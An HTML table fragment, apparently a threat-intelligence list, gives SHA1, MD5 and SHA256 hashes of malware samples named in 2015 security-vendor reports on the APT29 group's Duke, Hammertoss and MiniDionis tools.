<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">04299C0B549D4A46154E0A754DDA2BC9E43DFF76</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bfd2d6bf8e99332157a0fe46a4a91c52</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">28D29C702FDF3C16F27B33F3E32687DD82185E8B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8c9113aec4d0585f2744e2027ef8a03d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8aba704299ad5f649a48b822f548464a031a9c10fc28683010a5f6329a1bdc77</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2F53BFCD2016D506674D0A05852318F9E8188EE1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">07660a9b83b7fbc7ab372a911c69a85b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e1490d6e5ce4c2cddef0815c55bf8946cb830ce0ac7f586cf1ae16ef66f1bd8b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">317BDE14307D8777D613280546F47DD0CE54F95B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a4f3e00b3da3e9d9382840dfbdbef311</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">476099EA132BF16FA96A5F618CB44F87446E3B02</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">27f3d0556c59e32791567a09236507d9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b3bf1b4415afcdda6b7fbe07302fab1d865d1dc8fc6b024c98366a633e0612cb</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4800D67EA326E6D037198ABD3D95F4ED59449313</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8473fae7fdae7ee5a8b0fb64ebb596c1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">52D44E936388B77A0AFDB21B099CF83ED6CBAA6F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">72512c49401bd3d04a8ef6c7a6475307</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0f7d64f514e99a2abdc10dc85e7e6f57c210a0f35472f7b897a19b73be36bece</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6A3C2AD9919AD09EF6CDFFC80940286814A0AA2C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">50bf9c6de53b7de6906c2d5ed6177c28</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">78FBDFA6BA2B1E3C8537BE48D9EFC0C47F417F3C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f338e21422eca3a52239089f821519d6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dea20c241265e2995244187c8476570893df41b9623784a4ca6ed075721b8cdf</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9F5B46EE0591D3F942CCAA9C950A8BFF94AA7A0F</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">97886672cc570ba4a5d6a162e92d0155</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">85c5ba695992ed59269ea7f7a58f3453f6047729d1f68a444d450439bbccc1f4</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">BFE26837DA22F21451F0416AA9D241F98FF1C0F8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">837b522730ff896435682b36f7b27a3e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">12f58639a883b0fcfe3d2e8bcb0330b978731975c9dfa2f8e583adbafc4d534e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C16529DBC2987BE3AC628B9B413106E5749999ED</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e163d9a91f97f133b0e3f2bbe4dc226a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d4d79be85dc98f74088d6393a8fdf2b5d947ae4f279909af2aed0221dcecfe94</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CC15924D37E36060FAA405E5FA8F6CA15A3CACE2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b0a9a175e2407352214b2d005253bc0c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c8eb3365b7fb7683b9b465817e5cb87574026e306c700f3d103eba056777720</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">DEA6E89E36CF5A4A216E324983CC0B8F6C58EAA8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4d3a94134aaf590ae8ece0a57257e129</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">80cb4007b9756246404c260bc69abf5d4938a1cc217d40ecbfdd6171b02b9e24</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E33E6346DA14931735E73F544949A57377C6B4A0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e268e5c53da8361d4f7b6a884d7dfc8a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc207257bb88e323c57360a06895a45c29d15ad91c803b2af6132d8be620569a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ED0CF362C0A9DE96CE49C841AA55997B4777B326</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">856b224da7525ea5192efbef7a9b8112</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bfc1bafd9b01178037226fa55546d7ed7e9203c13e1b66419e887fee704d5196</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F54F4E46F5F933A96650CA5123A4C41E115A9F61</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ffb407dc2b20357302a4550a73f6c342</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ecd0ce1973500c27bb5d70f326d115fba84c0b1680a726a041ed57b42063e7b1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F97C5E8D018207B1D546501FE2036ADFBF774CFD</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b8690064dc61333c591252c4204fbbb3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c3ea57eea9f522cfc70ef8c3b614f7e44903293a2e8354359b99efbf4cd436df</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_Fireeye_Hammertoss_Stealthy_tactics_define_Russian_Cyber</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_Fireeye_Hammertoss_Stealthy_tactics_define_Russian_Cyber</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">42e6da9a08802b5ce5d1f754d4567665637b47bc_WerMgr.ex_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d3109c83e07dd5d7fe032dc80c581d08</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8995535721ebeaf6983c6cecf3182d756ca5b3911607452dd4ba2ad8ec86cf96</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_Kaspersky_Minidionis one more APT with a usage of cloud drives</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_Kaspersky_Minidionis one more APT with a usage of cloud drives</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c8eb3365b7fb7683b9b465817e5cb87574026e306c700f3d103eba056777720 (1)</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b0a9a175e2407352214b2d005253bc0c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c8eb3365b7fb7683b9b465817e5cb87574026e306c700f3d103eba056777720</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">10B31A17449705BE20890DDD8AD97A2FEB093674</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3a04a5d7ed785daa16f4ebfd3acf0867</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">38DD05B9CC892491347F4347870A6B77D9AEA856</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4cbd9a0832dcf23867b092de37c10d9d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2a36823323b857921d056c0161fc15d47f29b7513443346a0aeb537cbf437f0d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">44403A3E51E337C1372B0BECDAB74313125452C7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e00bf9b8261410744c10ae3fe2ce9049</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">47F26990D063C947DEBBDE0E10BD267FB0F32719</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">42ffc84c6381a18b1f6d000b94c74b09</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c1ee4232d1b6504fc7f93cb0478e90049a71992498ed2d701925d852e91cfcc3</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4F977DEBAA25925E82F254080E8F7C42B70CB669</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">030da7510113c28ee68df8a19c643bb0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7b3e344ea44a9b5fdcee89818435d377b4413e704f8c2ef5522a0255bd4eca74</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5367186E3AA9B2B178BA82922C88AF538D61A99A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01039a95e0a14767784acc8f07035935</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5875E9E27607AAB5D39E312CD141D8941B077462</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">98613ecb3afde5fc48ca4204f8363f1d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7f8d8992dda6a48c54234e76cf0a0f445842aea1cd91d3252185c7b436e51cde</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6C95CDBE7D3C65104ABD0912AA7DC99099887030</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2e64131c0426a18c1c363ec69ae6b5f2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">26fdc7682cf367d4d1e635a40beab0762cee43978a0f86867be03aab81244107</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">71031EBB535923722C8FCFDCBA127E4FDEF24F49</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e07ef8ffe965ec8b72041ddf9527cac4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7B8851F98F765038F275489C69A485E1BED4F82D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a9c045c401afb9766e2ca838dc6f47a4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d3d503934c0dfe75e386d0fb8da2e32238d93739624b6c5a929fe5b722b35d36</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">84BA6B6A0A3999C0932F35298948F149EE05BC02</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">70f5574e4e7ad360f4f5c2117a7a1ca7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">890B943BA5C43B74AD2965874A21C7EF4BA896FF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0f9534b63cb7af1e3aa34839d7d6e632</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">08b410d359ec2d6cab73bd6c0be138d9bdc475e3f63fec65794a74e5d5958b3b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">910DFE45905B63C12C6F93193F5DC08F5B012BC3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9018fa0826f237342471895f315dbf39</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9EAE02E8D4BC405AFD78DD364E96650F3608BF3B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c8b49b42e6ebb6b977ce7001b6bd96c8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93ecd67c6102802e2e058eac512a2c75434912c28dc2eae6c108451272008bc5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9EEF49FC724B9F40BE795A80BC6363EB0C6B6DD6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">51ea28f4f3fa794d5b207475897b1eef</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ca0b804c30052456362fe22ae6fa8482f91651c2c18dc41cda4c6e282fdede6f</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-07_PaloAlto_Tracking_MiniDionis</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CC15924D37E36060FAA405E5FA8F6CA15A3CACE2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b0a9a175e2407352214b2d005253bc0c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6c8eb3365b7fb7683b9b465817e5cb87574026e306c700f3d103eba056777720</span></td></tr>
